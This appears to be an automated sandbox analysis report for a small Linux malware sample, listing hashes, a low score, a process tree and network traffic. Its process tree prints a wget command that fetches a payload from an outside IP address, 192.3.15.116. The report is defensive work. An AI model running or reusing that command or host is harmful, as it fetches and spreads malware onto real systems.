d6843de49e97c1534f4cb32f94e75312c62b9f6f33b32f4c55906785294d6489 | Triage

Analysis

max time kernel
132s
max time network
155s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240226-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240226-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
17/04/2024, 15:14 UTC

Sharing

Report Analysis Logs

General

Target

f61069db3860b95f6928cfe2657d21ea_JaffaCakes118
Size

2KB
MD5

f61069db3860b95f6928cfe2657d21ea
SHA1

9541ca545ef2877f47cf9364d307fcee9e18888a
SHA256

d6843de49e97c1534f4cb32f94e75312c62b9f6f33b32f4c55906785294d6489
SHA512

311f782fa5f86eeeb54784327f87f4525303ce00d1c6233ffe51709ea3972b4f12f0797b3ac19792f53627c84585e16c98856d05d0c593a179f666356db68f0d

Score

1^/10

Malware Config

Signatures

/tmp/f61069db3860b95f6928cfe2657d21ea_JaffaCakes118
/tmp/f61069db3860b95f6928cfe2657d21ea_JaffaCakes118
1⤵
PID:1563
- /usr/bin/wget
  wget http://192.3.15.116/m-i.p-s.SNOOPY
  2⤵
  PID:1568

Network

DNS

cdn.fwupd.org

Remote address:

1.1.1.1:53

Request

cdn.fwupd.org

IN A

Response

cdn.fwupd.org

IN CNAME

dualstack.p2.shared.global.fastly.net

dualstack.p2.shared.global.fastly.net

IN A

151.101.66.49

dualstack.p2.shared.global.fastly.net

IN A

151.101.130.49

dualstack.p2.shared.global.fastly.net

IN A

151.101.2.49

dualstack.p2.shared.global.fastly.net

IN A

151.101.194.49
DNS

cdn.fwupd.org

Remote address:

1.1.1.1:53

Request

cdn.fwupd.org

IN AAAA

Response

cdn.fwupd.org

IN CNAME

dualstack.p2.shared.global.fastly.net

dualstack.p2.shared.global.fastly.net

IN AAAA

2a04:4e42::561

dualstack.p2.shared.global.fastly.net

IN AAAA

2a04:4e42:200::561

dualstack.p2.shared.global.fastly.net

IN AAAA

2a04:4e42:400::561

dualstack.p2.shared.global.fastly.net

IN AAAA

2a04:4e42:600::561
DNS

1527653184.rsc.cdn77.org

Remote address:

1.1.1.1:53

Request

1527653184.rsc.cdn77.org

IN A

Response

1527653184.rsc.cdn77.org

IN A

89.187.167.4

1527653184.rsc.cdn77.org

IN A

195.181.164.20
DNS

1527653184.rsc.cdn77.org

Remote address:

1.1.1.1:53

Request

1527653184.rsc.cdn77.org

IN AAAA

Response

1527653184.rsc.cdn77.org

IN AAAA

2a02:6ea0:ca00::4

1527653184.rsc.cdn77.org

IN AAAA

2a02:6ea0:ca00::3

151.101.194.49:443

tls

127 B
40 B
2
1
192.3.15.116:80

420 B
7
151.101.129.91:443

tls

127 B
40 B
2
1
195.181.164.19:443

tls

851 B
11
185.125.188.62:443

tls

135 B
2
185.125.188.62:443

tls

135 B
2
151.101.194.49:443

cdn.fwupd.org

tls

11.4kB
965.8kB
184
706
151.101.129.91:443

extensions.gnome.org

tls

4.0kB
224.8kB
65
178
89.187.167.4:443

odrs.gnome.org

tls

11.1kB
1.7MB
198
1203
192.3.15.116:80

300 B
5

224.0.0.251:5353

146 B
2
1.1.1.1:53

cdn.fwupd.org

dns

70 B
185 B
1
1

DNS Request

cdn.fwupd.org

DNS Response

151.101.66.49

151.101.130.49

151.101.2.49

151.101.194.49
1.1.1.1:53

cdn.fwupd.org

dns

70 B
233 B
1
1

DNS Request

cdn.fwupd.org

DNS Response

2a04:4e42::561

2a04:4e42:200::561

2a04:4e42:400::561

2a04:4e42:600::561
1.1.1.1:53

1527653184.rsc.cdn77.org

dns

81 B
113 B
1
1

DNS Request

1527653184.rsc.cdn77.org

DNS Response

89.187.167.4

195.181.164.20
1.1.1.1:53

1527653184.rsc.cdn77.org

dns

81 B
137 B
1
1

DNS Request

1527653184.rsc.cdn77.org

DNS Response

2a02:6ea0:ca00::4

2a02:6ea0:ca00::3

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads